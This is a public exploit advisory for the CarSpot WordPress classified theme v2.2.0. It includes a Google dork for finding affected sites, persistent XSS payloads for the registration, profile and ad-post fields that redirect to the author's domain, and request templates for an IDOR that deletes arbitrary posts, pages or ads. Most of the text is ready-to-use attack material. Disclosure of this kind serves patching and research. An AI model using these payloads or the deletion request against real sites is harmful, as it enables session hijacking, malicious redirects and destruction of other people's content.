# Exploit Title: CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/carspot/
# Date: 14/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://scriptsbundle.com/
# Software Link: https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539
# Version: 2.2.0
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 639

----[]- Info: -[]----
Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/

----[]- Persistent XSS -> Registration Form/User Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input field: «Mobile Number».

Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_


----[]- Persistent XSS -> Ad Post -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».

Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_


----[]- IDOR: -[]----
Delete any post/page/ad:


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_


ad_id=XXXX - page/post/ad unique WordPress ID, can be discovered as a page class for <body> tag.


HTTP/1.1 200 OK

1|Ad removed successfully.